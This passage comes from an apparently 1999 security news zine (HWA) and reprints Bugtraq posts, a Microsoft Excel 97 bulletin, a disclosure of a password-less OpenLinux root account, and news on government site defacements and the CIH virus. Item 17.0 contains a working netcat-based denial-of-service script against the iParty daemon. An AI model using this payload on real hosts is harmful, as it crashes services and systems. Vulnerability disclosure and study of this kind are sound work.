--------------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

17.0 iParty pooper
~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Received: from hotmail.com (law2-f15.hotmail.com [216.32.181.15]) by
netspace.org (8.8.7/8.8.7) with SMTP id NAA20477 for
<bugtraq@netspace.org>; Sat, 8 May 1999 13:10:37 -0400
Received: (qmail 46545 invoked by uid 0); 8 May 1999 17:11:35 -0000
Received: from 142.169.181.31 by www.hotmail.com with HTTP; Sat, 08 May 1999
10:11:34 PDT
X-Originating-IP: [142.169.181.31]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_e6987ad_6338d761$45c2e550"
Message-ID: <19990508171135.46544.qmail@hotmail.com>
Date: Sat, 8 May 1999 13:11:34 EDT
Reply-To: wh00t X <bugtraq2@HOTMAIL.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: wh00t X <bugtraq2@HOTMAIL.COM>
Subject: iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)
X-cc: jaldrich@bumpkinland.com, packetstorm@genocide2600.com
To: BUGTRAQ@netspace.org


Content-type: text/plain; format=flowed;


Hi,


iParty, by Intel Experimental Technologies Department, (unofficial
information source at http://www.bumpkinland.com/iparty/), is a small voice
conferencing program, which includes a server daemon in the download. It is
handy for quick internet voice chat, but the server can be killed by sending
a large amount of extended characters to the server port, which is 6004 by
default, without being logged. The daemon either crashes quietly or GPF
(varies from box to box).
I've been told an advisory of some sort has already been released for
this particular vulnerability but I believe the matter needs further
attention because:


1. While there are other newer and better voice conferencing programs out,
iParty continues to be widely used.
2. This vulnerability may be worse than thought: I tested my program
(attached to message) against 4 random Windows 95/98 boxes with the daemon
running, and after 2 or 3 crashes in a row, on top of crashing the iParty
daemon, some experienced disconnection from the internet, ICQ and/or
Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash.


Thanks,
Ka-wh00t



_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.comContent-Type: text/plain; name="ippooper.sh"
Content-Disposition: attachment; filename="ippooper.sh"
X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id SAA23880


ippooper.sh

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.


if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"̐aœp/˜HÔD†0iAá½L%Ï̂EBEԁð'*}ÒyÓÔ¥(3êz‹nÃuèԏj+¨°(֗քd'‰™øZiXåËy7 ¡'``྽ϝ Cµ¶ïüÖʹçî³ÏÞçì½Ï>çܐE¢6‡â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§ „8ÂӁ'L5"ïé²±žá¤¸DRGÒIôlq„Y­g›»ÒiƒÆiÕ¾ëH¹H„w‹òá½²»Ô3ðlŽš*oÎ#ésC9m,

_EOF_
echo ""
echo "
Sending kill..."
cat ipp00p | nc $1 $2
echo "
Done."
rm -f ipp00p
fi
fi


@HWA

18.0 Microsoft Security Advisory Bulletin: Excel 97 virus patch (MS99-14)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Microsoft Security Bulletin (MS99-014)
--------------------------------------


Patch Available for Excel 97 Virus Warning Vulnerabilities


Originally Posted: May 7, 1999


Summary
=======
Microsoft has released a patch that eliminates vulnerabilities in the Excel
97 virus warning mechanism. The patch is fully supported, and Microsoft
recommends that affected customers download and install it, if appropriate.


Issue
=====
Microsoft Excel 97 provides a feature that warns the user before launching
an external file that could potentially contain a virus or other malicious
software. This feature allows the user to weigh the risk of opening the
file, based on its origin, the network it is located on and the security
practices in operation there, the sensitivity of the data on the user's
computer, and other factors.


However, certain scenarios have been identified that could be misused to
bypass the warning mechanism. In general, they require the use of
infrequently-combined features and commands, and are unlikely to be
encountered in normal use. This patch addresses these issues so that they
cannot be taken advantage of by a malicious user.


While there are no reports of customers being adversely affected by any of
the vulnerabilities eliminated by the patch, Microsoft is proactively
releasing the patch to allow customers to take appropriate action to protect
themselves against it. These fixes are already built into Excel 2000 and
users of that product will not need to download this patch.


Affected Software Versions
==========================
- Microsoft Excel 97


What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.


Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.


Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.
(Note: It might take 24 hours from the original posting of this bulletin
for the KB article to be visible in the Web-based Knowledge Base.)


What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that
this vulnerability poses to their systems and determine whether to download
and install the patch. The patch can be found at:
- http://officeupdate.microsoft.com/downloaddetails/xl8p6pkg.htm


More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Patch Available for Excel 97 Virus Warning Vulnerabilities
(the Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.


Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.


Revisions
=========
- May 7, 1999: Bulletin Created.



For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security



--------------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "
AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

19.0 LISA install leaves root access: Openlinux 2.2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

X-From_: linux-security-request@redhat.com Sun May 9 05:45:16 1999
Date: Sat, 8 May 1999 23:46:40 -0400 (EDT)
From: Andrew McRory <amacc@mailer.org>
X-Sender: amacc@ns1.mailer.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Message-ID: <Pine.LNX.4.02.9905082300390.13930-100000@ns1.mailer.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Subject: [linux-security] OpenLinux 2.2: LISA install leaves root access without password



Hello,


I believe I've found a bug in the installation process of OpenLinux 2.2
when using the LISA boot disk. During the installation a temporary passwd
file is put on the new file system containing the user "
help" set uid=0
gid=0 and no password. Once you are prompted to set the root password and
default user password a new passwd and shadow file is created yet the help
user is left in the shadow file with, you guessed it, no password... Here
are the offending entries:


/etc/passwd
help:x:0:0:install help user:/:/bin/bash


/etc/shadow
help::10709:0:365:7:7::


Anyone who installed OpenLinux 2.2 using the LISA boot disk should check
their password file now ;-)


I found this using a cdrom I made from a mirror of the mirror at
ftp.tux.org. Just to make sure I wasn't mixed up I redownloaded the
install.144 file from ftp.calderasystems.com and tried again. Same thing.
The install disk is version 137 dated 26Mar99 (displayed on the boot
message).


I wrote Caldera a message late in the day Friday regarding this bug but
haven't heard back from anyone. I've tried to resist posting this until I
hear back but I really feel people should know now!!


PS: I'm not sure if Lizard, the graphical installation method, has this
problem. It crashes before it does much here.... that's why I tried LISA.


Thanks,




Andrew McRory - amacc@linuxsys.com ***********************************
Linux Systems Engineers / The PC Doctors *
3009-C West Tharpe Street - Tallahassee, FL 32303 *
Voice 850.575.7213 ***************************************************


--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------


To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null

@HWA

20.0 BUGTRAQ receives a plaque at SANS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 08:46:48 -0700
Reply-To: Aleph One <aleph1@UNDERGROUND.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Aleph One <aleph1@UNDERGROUND.ORG>
Subject: Adminisrivia
To: BUGTRAQ@netspace.org


The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
a plaque during the SANS conference now happening at Baltimore for being
one of the three most valuable security publications. This is in response
to a survey the did at an earlier conference. I'd like to thank SANS
for the gesture. Although I accepted the plaque it is really for all of
you. Cheers.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01


Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 12:52:22 -0400
Reply-To: Brian Fisk <bfisk@netspace.org>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Brian Fisk <bfisk@netspace.org>
Subject: Re: Adminisrivia
To: BUGTRAQ@netspace.org
In-Reply-To: <19990510084648.C29946@underground.org>


I would also like to thank the SANS Institute on behalf of NetSpace, as
they also donated a sizable chunk of money for a mail server upgrade as
part of the same award. This donation, combined with other donations from
the Bugtraq community in the past allowed us to double (or potentially
even more) our mail delivery capacity for this list as well as all the
others that NetSpace serves. Thanks to everyone here who makes this list
what it is.


Brian Fisk
NetSpace Administrator


On Mon, 10 May 1999, Aleph One wrote:


> The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
> a plaque during the SANS conference now happening at Baltimore for being
> one of the three most valuable security publications. This is in response
> to a survey the did at an earlier conference. I'd like to thank SANS
> for the gesture. Although I accepted the plaque it is really for all of
> you. Cheers.
>
> --
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>


--
Brian Fisk bfisk@netspace.org




@HWA

21.0 White House takes server offline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

White House Takes Server Offline


contributed by Weld Pond
In order to conduct an "
Admistrative Review" the White House took its web server offline and
also closed off all e-mail to and from the outside world. This comes after what HNN believes
to be a successful crack of the www1. server at 8:50am EST Monday morning. This crack was
_not_ related to other recent .gov/.mil cracks nor was this crack strongly related to the
Chinese embassy bombing or had any other political motives. Other mainstream news outlets
are getting their stories confused. (If you only read one of these articles I recommend the
one by Brock Meeks of MSNBC, it seems to be the most thorough.)

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
MSNBC
http://www.msnbc.com/news/268339.asp
Heise.de
http://www.heise.de/newsticker/data/fr-11.05.99-000/
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/whhack990511.html
C|Net
http://www.news.com/News/Item/0,4,36431,00.html?st.ne.fd.mdh.ni
CNN
http://www.cnn.com/TECH/computing/9905/12/white.house.site.01/index.html
Nando Times
http://www.techserver.com/story/body/0,1634,47750-77011-550124-0,00.html

MSNBC

White House Web site shut down
Purported attacker says there was no political motive
By Brock N. Meeks and Alan Boyle
MSNBC

WASHINGTON, May 11 The White House shut down its public Web site for more than 24 hours
because of computer attacks, a spokesman said Tuesday. Government Web sites have sustained
a wave of assaults apparently aimed at protesting last week’s NATO bombing of the Chinese
Embassy in Belgrade. However, in an interview with MSNBC, a computer user who claimed a
role in the White House Web break-in denied that there was a political motive.

AN ATTEMPT was made to break into the system that operates the Web page yesterday morning,
White House spokesman Barry Toiv told MSNBC Tuesday, and so what we’ve done is use existing
procedures to limit access to the system so we could make a full assessment.The Web site was
back in operation by Wednesday morning.

Computer attacks on government Web sites have taken on a higher profile in the wake of Friday’s
embassy bombing, which left three dead and 20 injured. The bombing, which NATO said was due to an
intelligence error, sparked a wave of demonstrations at the U.S. Embassy in Beijing, as well as
widespread criticism online and offline.

A variety of federal sites have been defaced by political protesters. But the primary motivation
behind the attack on the White House site was merely to show that it could be done, a teen-ager who
said he was involved in the attack told MSNBC.

A telephone conversation with the 18-year-old was arranged by a mutually trusted intermediary. The
teen, who claimed to be a member of the group known as gH or Global Hell, spoke on the condition that
neither his real name nor his hacker nickname would be published. To back up his claim, he provided
internal user logs listing White House staff. His account also was consistent with other reports
provided by trusted third parties.

`JUST LUCK’

The teen said the White House Web break-in was actually just luck. Members of gH caught the White
House system administrator transferring log files in an insecure manner via an unsecured FTP site that
was snooped out from another box (computer), he told MSNBC.

I have no idea why they would do that Whoever that admin was, he didn’t know what he was doing, he
said. Along with gH, a group calling itself the Hong Kong Danger Duo took part in the White House hack,
the teen said.

He said the White House hack lasted for only a few minutes, due to what is known as a crontab, a timed
command set by the system administrator. This command automatically refreshes the entire site with identical
content from a secure server to help guard against the kind of attack that took place Monday.

OTHER DEPARTMENTS HIT

Government sources told NBC News that attackers also hit the Web servers for the departments of Energy,
Interior and Labor, as well as the U.S. Information Agency’s Web site. All those Web sites were in service
Tuesday afternoon, although traffic to the Energy Department’s Web site was redirected to a numerical
Internet address.

The sources said the intruders left behind cyber-graffiti slogans saying, for example, You bombed the
Chinese Embassy, this is what you’re going to get. Some of the graffiti was in Chinese characters, the
sources said.

In all cases, the Web computer servers contained only publicly available information, and no classified
information was compromised, officials emphasized.

The politically motivated attacks on departmental Web sites appear to be unrelated to the White House attacks.
The teen from gH said he had no idea who carried out the other computer attacks, an assertion that meshed with
other reports.

Several hacker-oriented sites including AntiOnline as well as Hacker News Network and Attrition.Org
posted what they said were copies of the White House hack. A message hidden inside the source code for the page
reads: You found my elite hidden source. Wow. Ok, no real msg here. Stop all the war, no point for it. This box
wasn’t ever secure.

Brian Martin, who runs the Attrition.Org site, said the stop all the war reference doesn’t mean the attack was
launched with politics in mind.A lot of hackers will do that to kind of justify what they are doing, Martin said.
They hacked this site because they could, he said. They saw a window of opportunity and took it.
The White House site is operated under contract by PSINet of Herndon, Va.

NBC News correspondent Jim Miklaszewski and
MSNBC’s Bob Sullivan contributed to this report.

@HWA

22.0 Feds to install IDS
~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Feds Look to Install IDS


contributed by erewhon
The GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National
Infrastructure Protection Center (jeeez, think they enough people working on this?) are working on a
Federal Intrusion Detection Network (FIDNET) which will provide a common center for response to cyber
attacks on agencies.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-fidnet-5-11-99.html

MAY 11, 1999 . . . 18:10 EDT


Agencies lay groundwork for intrusion-detection
network

BY DIANE FRANK (dfrank@fcw.com)

A group of federal agencies has completed the initial model of a
governmentwide intrusion-detection network that will provide a common
center for response to cyberattacks on agencies.

The Federal Intrusion Detection Network (FIDNET) is in the very early
stages of development, and the group of federal agencies heading the
development effort recently agreed on possible agency responsibilities and a
reporting structure, said Tom Burke, assistant commissioner of information
security at the General Services Administration's Federal Technology Service,
today at the Outlook 2000 conference in Falls Church, Va.

GSA, the Critical Infrastructure Assurance Office, the National Security
Agency and the FBI's National Infrastructure Protection Center are all
developing FIDNET as part of President Clinton's directive to protect the
nation's mission-critical systems. The system is intended to provide all
agencies with intrusion-detection systems that will allow agencies to locate
incidents across the government as soon as they occur. It also will serve as a
center for analysis of intrusions or attacks.

The system will be made of three main blocks, with the civilian agencies
reporting to the Defense and intelligence agencies and possibly a full-time
program management office overseeing the whole system. FIDNET is based
on the Defense Department's incident-reporting network, which is much
further along than the efforts in the civilian agencies. "
We're looking to
leverage the work that has already been done at Air Force and DOD so we
don't duplicate their effort," Burke said.

The blocks eventually will include a similar network being developed in the
private sector and the Federal Computer Incident Response Capability center
at GSA, Burke said.


@HWA

23.0 CIH Damages climb in China
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

360,000 Systems Damaged in China


Contributed by DongWong
A survey released earlier this month indicate that at least 360,000 systems where damaged by
the CIH or Chernobyl virus. The damage was estimated at Rmb1 million (US$120 million). The
survey was conducted by Beijing Rising Computer Science and Technology Development Co., Ltd.,
a Chinese anti virus company.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf

  
?CID=onair/asabt/moren/57681

24.0 Company claims damages in web page defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Company Claims Damages From Attack


contributed by War3z Dud3
An Issaquah, Washington high-tech company is claiming thousands of dollars worth of damage after
it had it web page defaced. The defaced page was a protest of NATOs bombing of the Chinese Embassy
in Belgrade. The FBI is investigating and have claimed to have tracked the attackers to New York,
one in Massachusetts, and another in St. Louis.

Yahoo Daily News
http://dailynews.yahoo.com/headlines/local/state/washington/story.html?s=v/rs/19990510/wa/index_2.html#2

Internet Company Hit By Hackers - (ISSAQUAH) -- An Issaquah
high-tech company is dealing with thousands of dollars in damage, thanks to the Chinese embassy
bombing in Belgrade. Michael Renz at webcityusa-dot- com went online last night to update his
websites for a dozen local businesses. That's when he realized someone had destroyed them. In
their place, the hackers had placed graphic pictures of embassy bombing victims and hate messages
blasting the U-S and NATO. Authorities, including the FBI, are investigating and have reportedly
traced the action to three different university websites: one in New York, one in Massachusetts,
and another in St. Louis.


@HWA


25.0 Three .gov sites hacked
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Three Gov Servers Cracked in Protest of Embassy Bombing


contributed by Space Rogue
The Department of Energy, The Department of the Interior, and the National Park Service all had their
web sites defaced in protest of the NATO bombing of the Chinese Embassy in Yugoslavia. The defaced
pages included pictures of the people killed in the bombing.

ABC News
http://abcnews.go.com/sections/world/DailyNews/kosovo_chinacyber_990509.html

Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-11may1999-2.htm

C|Net
http://www.news.com/News/Item/0,4,36311,00.html?owv

CNN
http://www.cnn.com/TECH/computing/9905/10/hack.attack.02/index.html

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nato-5-10-99.html

ITN
http://www.itn.co.uk/World/world19990510/051005w.htm

Federal Computer Week;

MAY 10, 1999 . . . 14:25 EDT


Hackers retaliate after NATO bombing

BY BRAD BASS (brad_bass@fcw.com)

A group of Chinese hackers defaced the home pages of the departments of
Energy and Interior this past weekend, apparently in retaliation for NATO's
accidental bombing of the Chinese embassy in Belgrade.

The hackers claimed their motives were not political but were a response to
the death of Chinese journalists resulting from NATO's attack. The messages
were written in Chinese and English.

The hackers referred to the bombing as a "Nazi action" and urged NATO,
and specifically the United States, to accept responsibility. "You have owed
[sic] Chinese people a bloody debt which you must pay for,"
said a message
on the DOE Web site on Sunday afternoon. "We won't stop attacking until the
war stops!"


A spokesman for iDefense, an information clearinghouse on critical
infrastructure protection, said the attack probably did little harm but
characterized it as "a warning sign" to the government.

"It's just another sign that these types of things are easy to accomplish if you
have a modem and a little technical knowledge,"
the spokesman said. "It's not
too far removed from taking it to another more harmful level."



-=-


C|Net;

Chinese attack embassy bombing on Net
By Reuters
Special to CNET News.com
May 10, 1999, 8:15 a.m. PT
URL: http://www.news.com/News/Item/0,4,36311,00.html

BEIJING--Chinese computer buffs flooded cyberspace with anti-U.S. rhetoric today,
hacking into a U.S. embassy Web site and overloading chat rooms with condemnation of
the NATO bombing in Yugoslavia.

As angry protesters hit the pavement in a more traditional form of outrage, hurling
whatever came to hand at the U.S. and British embassies in Beijing, China's wired
elite logged on to vent their anger.

More than 24,000 protest messages have been posted on one popular chatroom at Netease.com
since three NATO missiles slammed into the Chinese embassy compound in Belgrade Friday night,
killing three journalists and injuring more than 20 people.

Most of the postings were one-line invectives against President Clinton or the NATO bombing
campaign in Yugoslavia. But others focused on ways to retaliate for the strike.

"Our strongest weapon is for the masses to begin a campaign to boycott American goods," wrote
one user. "This is what the Americans are most scared of.Americans love money and they listen
the most to taxpayers. If they lose economic gains then they lose the essentials."


Another user, writing under the name "KILL-USA," called on China to make use of the situation
to push for entry into the World Trade Organization.

One urged his counterparts to pirate U.S. software to cripple the American economy.

Others condemned students and workers who had attacked foreign journalists covering violent
protests outside the U.S. embassy over the weekend.

"The anger in our hearts must not lead us to lose reason and curse and beat foreigners when we
see them,"
wrote a user called Chinese Kung Fu.

The outpouring of angst on the Web was so great that many of China's most popular sites added
additional servers to keep up with the demand.

The popular Sohu.com also set up a special site to gather responses to the attack on the Chinese
embassy and was receiving one response every second earlier
today.

In addition to the Web postings, Chinese hackers twice assailed the U.S. embassy Web site,
replacing the home page with text reading "down with barbarians," the state-run China Daily reported.

Today the Web site could be accessed through an American server, but the Chinese route was blocked.

Word of the bombing spread rapidly on the Internet--in contrast to the many hours the official media
took to report it--and many students said they first heard about street protests in Beijing on the Web.

More than 2 million Chinese use the Internet, one of the only forums of expression free from government
oversight.

Story Copyright © 1999 Reuters Limited. All rights reserved.




@HWA


26.0 Full Disclosure, the only way to go.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Full Disclosure - The Only Way to Be Sure


contributed by remage
A rather interesting rant has been posted by L0pht Heavy Industries, Inc. The rant covers
the issue of Full Disclosure which has been argued about and argued about. In the wake of
the recent showcode-Webtrends-L0pht-Microsoft advisory the L0pht makes a very convincing
argument that Full Disclosure is the only way to protect those who are
vulnerable.

L0pht Heavy Industries, Inc.
http://www.l0pht.com/

05.10.1999
There is a new trend in the reporting of security vulnerabilities
these days. Many of the problems are being reported by companies
that make products to detect these problems. While more people
researching the security of products is a good thing, it is certainly
having an effect on the free flow of security information.
Sometimes this effect is to the detriment of the customers of the
product that the flaw exists in.

If a company makes a product that scans for security problems,
they are going to want to add their newly discovered vulnerability
to their list of things to scan for. They are probably, depending on
the seriousness of the problem they have uncovered, going to want
to make the advisory of the problem into a full scale press release
that will hype their product. Usually the press release won't really
tell you how to find the problem or how to solve it. You are going to
need to download their product for that.

When security problems exist on production servers accessible from
the internet, time is critical. Every day that goes by is another day
that the server is exposed. How many people know about the
problem? Who is actively exploiting it? It is impossible to tell. Good
ethical security practice is to tell the people effected quickly,
especially if there are steps they can take to mitigate or eliminate
the risk themselves.

The L0pht recently found a problem with Microsoft's IIS 4.0 web
server, the showcode problem. It allowed web users to read files
anywhere on the web server that the file permissions were set to
be world-readable. This turns out to be the case in many web
servers that are not locked down properly. The L0pht was surprised
at how widespread the problem was. Many high profile e-commerce
servers were effected. Many, many corporate web servers were
effected.

The research of the problem, which took less than a day, came up
with a simple solution. Delete the sample files which made the
machine vulnerable. They don't need to be on production servers
anyway. We crafted an advisory and gave out the solution.

When we reported this to Microsoft they said that they had known
about the problem for "several weeks". They had been notified by
WebTrends about the problem, were researching it, and would issue
a Security Bulletin. It didn't seem to be that so complicated an
issue that would take several weeks to research. And the fix was
simple. Just delete the files. No need to download a hotfix or even
tweak the registry. What was taking so long?

The L0pht released the showcode advisory to Bugtraq, computer
industry reporters, and Microsoft on May 7, 1999, 9:30am EST.
Later that day, approximately 1:40 pm EST, WebTrends released a
press release about the same problem. It spoke of how WebTrends
had discovered the problem. The WebTrends press release didn't
tell how to detect the problem and had no solution to the problem.
Two things that were present in the L0pht advisory. It seemed that
you had to download and run their product if you wanted this
information.

It makes one wonder if the press release was put out at that
particular time because the L0pht had informed the public about the
problem first. It makes one wonder why Microsoft kept this problem
and easy solution to themselves for several weeks.

Many crackers keep security vulnerabilities secret so that they can
exploit them without worrying about vendor patches or fixes by
system administrators. This is looked down upon highly by the
security community as totally unethical. Why keep the
vulnerabilities secret unless you are going to exploit them, or
perhaps trade them for something?

Now we have software vendors keeping things secret. At least
secret for a substantial period of time. Is this the way we want the
industry to behave?

This is why full disclosure mailing lists such as Bugtraq and web
sites such as Packet Storm Security are so important. They allow
customers to get vulnerability reports, and hopefully fixes, in a
timely manner. There is no centralized clearinghouse such as the
software vendor or some government agency to slow things up for
their own ends.

Vulnerability information is extremely valuable both to attackers and
customers. Companies and organizations that release this
information openly and as soon as possible are doing the security
community a service. Those who choose to use the information for
their own purposes first put customers at risk.

@HWA

27.0 NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NIPC releases CyberNotes


contributed by Simple Nomad
The National Infrastructure Protection Center (NIPC), which is essentially being run by the FBI,
has released online copies of "CyberNotes", the newsletter whose mission is to "support security
and information system professionals with timely information on cyber vulnerabilities, hacker
exploit scripts, hacker trends, virus information, and other critical infrastructure-related best
practices"
. It reads like a government version of numerous hacker web sites. Our tax dollars at work.

NIPC Cyber Notes
http://www.nipc.gov/nipc/nipcpublic.htm

Oh, and if you have never visited the NIPC web site it is
good for a laugh or two.

National Infrastructure Protection Center
http://www.nipc.gov/

@HWA

28.0 Cure for CIH
~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Cure for CIH Found


contributed by Scores
A student in Bangladesh claims to have found a cure for the CIH or Chernobyl virus that wipes out thousands of
systems world wide last month. Monirul Islam Sharif, an undergraduate computer science student claims that a
70K-byte C language program he has named MRECOVER will recover the FAT table and the first partition of a
FAT16 table.

Computer World
http://www.computerworld.com/home/news.nsf/all/9905101cih

MRECOVER
http://members.xoom.com/monirdomain

Student touts 'Chernobyl' cure
By Sanjit Singh


NEW DELHI -- One student invented it, but another has written an antidote to help users who lost data to the CIH
computer virus.

The Chernobyl virus, also known as CIH, was invented by onetime Taiwanese student Chen Ing-hau and
caused havoc all over Asia April 26, infecting thousands of PCs in South Korea, Singapore, India, Bangladesh
and China. (Most major U.S. corporations with updated antivirus software escaped serious damage.) But it now
has a cure, courtesy of Monirul Islam Sharif, an undergraduate computer science student at Dhaka
University in Bangladesh.

Sharif, 21, said he wrote the 70K-byte C language program, which he called MRECOVER, in 24 hours.

"I started working on it on April 27, when a friend brought his infected hard drive to me, and by the next day, it
